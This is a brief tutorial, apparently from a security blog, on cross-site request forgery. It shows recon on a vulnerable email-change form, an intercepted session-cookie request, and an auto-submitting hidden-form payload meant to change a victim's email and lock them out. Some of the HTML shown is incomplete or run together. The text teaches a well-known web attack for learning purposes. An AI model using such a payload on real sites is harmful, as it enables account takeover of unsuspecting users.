An Introduction to CSRF Attacks

 - 2 min read


We have a web application that’s vulnerable to CSRF attacks. What we want to do is to create a malicious HTML snippet. This page if accessed by an arbitrary user should auto-submit on their behalf, using their own credentials (cookies).

More specifically, the goal is to change a user’s email, and lock them out of the site.


We want to target the “Change Email” form, so let’s do some recon first by logging into our account to check things out.

After logging in, we can see the “Change Email” page on The specific form looks like this:

HTTP/1.1 200 OK
Content-Length: 3069

<!DOCTYPE html>
    <form class="login-form" action="/email/change-email" method="POST">
        <input required type="email" name="email" value="">
        <button class='button' type='submit'> Update email </button>

Let’s submit this form with our account, then intercept it to see what’s inside:

POST /email/change-email HTTP/1.1Host:
Cookie: session=4TPtiDWqNK0xcLA3anvevopNojTU5zTe

We can see that it’s vulnerable to CSRF attacks because:

  1. There is a specific action POST /email/change-email
  2. It’s a cookie based request
  3. The request parameters are predictable, in this case it’s just email


Now that we have all the pieces, let’s craft the exploit. We want to write a similar form that has hidden inputs, and that auto-submits, like this one:

    <form action="" method="POST">      <input type="hidden" name="email" value="" />    </form>
      document.forms[0].submit();    </script>

That’s it! We can verify that it does the job by going to the page ourselves and checking the new email